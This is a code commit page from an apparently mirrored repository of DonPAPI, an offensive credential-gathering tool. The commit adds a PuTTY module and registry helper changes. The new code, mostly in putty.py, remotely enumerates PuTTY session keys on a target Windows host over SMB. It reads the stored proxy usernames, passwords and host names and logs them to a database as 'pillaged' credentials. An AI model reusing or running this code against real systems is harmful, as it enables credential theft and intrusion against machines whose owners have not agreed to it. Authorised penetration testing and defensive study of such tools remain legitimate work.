RepoMirrors/DonPAPI
1
0
Fork 0
mirror of https://github.com/login-securite/DonPAPI synced 2025-01-03 05:02:17 +00:00
Code Issues Packages Projects Releases Wiki Activity

putty proxy session support

Browse Source
This commit is contained in:
Pierre-Alexandre Vandewoestyne 2022-09-26 14:29:52 +02:00
parent 1280cad22d
commit 85e0577081
5 changed files with 89 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
database.py
View File

@ -161,6 +161,7 @@ class reporting:
if 'sysadmin' in credz_content:
credz_content.append('VNC')
credz_content.append('MRemoteNG')
credz_content.append('Putty')
#credz_content.append('VNC')
data = """<table class="statistics"><TR>

19
lib/fileops.py
View File

@ -207,18 +207,33 @@ class MyRegOps():
try:
#self.myRegHandler.__options.action='QUERY'
self.options.keyName = reg_path
self.options.s = True
self.options.s = True #__print_all_subkeys_and_entries
self.options.v = False
self.options.ve = False
self.reg_init()
self.logging.debug(f"[{self.options.target_ip}] Querying reg : {self.options.keyName}")
#self.myRegHandler=RegHandler(self.options.username, self.options.password, self.options.domain, self.options)
self.myRegHandler.run(self.options.target_ip,self.options.target_ip)
return self.myRegHandler.run(self.options.target_ip,self.options.target_ip)
except Exception as ex:
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception get_reg_list {bcolors.ENDC}")
self.logging.debug(ex)
def get_reg_subkey(self,reg_path):
try:
#self.myRegHandler.__options.action='QUERY'
self.options.keyName = reg_path
self.options.s = False #__print_all_subkeys_and_entries
self.options.v = False
self.options.ve = False
self.reg_init()
self.logging.debug(f"[{self.options.target_ip}] Querying reg : {self.options.keyName}")
#self.myRegHandler=RegHandler(self.options.username, self.options.password, self.options.domain, self.options)
return self.myRegHandler.run(self.options.target_ip,self.options.target_ip)
except Exception as ex:
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception get_reg_list {bcolors.ENDC}")
self.logging.debug(ex)
from impacket.smb3structs import FILE_READ_DATA, FILE_WRITE_DATA

6
lib/reg.py
View File

@ -226,17 +226,19 @@ class RegHandler:
else:
print(keyName)
self.__print_key_values(dce, ans2['phkResult'])
values=[]
i = 0
while True:
try:
key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i)
print(keyName + '\\' + key['lpNameOut'][:-1])
values.append(f"{keyName}\\{key['lpNameOut'][:-1]}")
i += 1
except Exception:
except Exception as e:
break
# ans5 = rrp.hBaseRegGetVersion(rpc, ans2['phkResult'])
# ans3 = rrp.hBaseRegEnumKey(rpc, ans2['phkResult'], 0)
return values
def __print_key_values(self, rpc, keyHandler):
i = 0
while True:

13
myseatbelt.py
View File

@ -1909,6 +1909,11 @@ class MySeatBelt:
myMRemoteNG = mRemoteNG(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db,self.users)
myMRemoteNG.run()
def GetPutty(self):
from software.sysadmin.putty import Putty
myNewModule = Putty(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db)
myNewModule.run()
def GetNew_Module(self):
myNewModule = new_module(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db,self.users)
myNewModule.run()
@ -1921,6 +1926,8 @@ class MySeatBelt:
self.do_who()
self.get_users()
#
self.GetPutty()
'''
if self.options.no_remoteops == False:
try:
@ -1937,12 +1944,14 @@ class MySeatBelt:
if self.options.no_browser == False:
self.GetChormeSecrets()
self.GetMozillaSecrets_wrapper()
if self.options.no_vnc == False and self.options.no_sysadmins == False:
self.GetVNC()
if self.options.no_sysadmins == False :
self.GetMRemoteNG()
self.GetPutty()
if self.options.no_vnc == False:
self.GetVNC()
if self.options.no_recent == False:
self.GetRecentFiles()
'''
"""
***Dev your new module code and start it from here

56
software/sysadmin/putty.py Normal file
View File

@ -0,0 +1,56 @@
# Code based on vncpasswd.py by trinitronx
# https://github.com/trinitronx/vncpasswd.py
import binascii
import codecs
import traceback
from . import d3des as d
from lib.toolbox import bcolors
# from lazagne.config.winstructure import *
class Putty():
def __init__(self,smb, myregops, myfileops, logger, options, db):
self.myregops = myregops
self.myfileops = myfileops
self.logging = logger
self.options = options
self.db = db
self.smb = smb
def putty_from_registry(self):
pfound = []
puttys = (
('Putty', 'HKCU\\Software\\SimonTatham\\PuTTY\\Sessions'),
#('WinSCP', 'Software\\Martin Prikryl\\WinSCP 2\\Configuration', 'Security'),
)
for putty in puttys:
try:
reg_sessions = self.myregops.get_reg_subkey(putty[1])
for reg_session in reg_sessions:
self.logging.debug(f'Found Putty session : {reg_session}')
ProxyPassword=self.myregops.get_reg_value(reg_session, 'ProxyPassword')[1]
HostName=self.myregops.get_reg_value(reg_session, 'HostName')[1]
ProxyUsername=self.myregops.get_reg_value(reg_session, 'ProxyUsername')[1]
self.logging.debug(
f"[{self.options.target_ip}] Found Putty Proxy : {ProxyUsername}:{ProxyPassword}@{HostName} ")
############PROCESSING DATA
self.db.add_credz(credz_type='Putty',
credz_username=ProxyUsername,
credz_password=ProxyPassword,
credz_target=HostName,
credz_path='',
pillaged_from_computer_ip=self.options.target_ip,
pillaged_from_username=self.options.user)
except Exception:
self.logging.debug(f'Problems with putty : {putty}')
continue
return pfound
def run(self):
return self.putty_from_registry()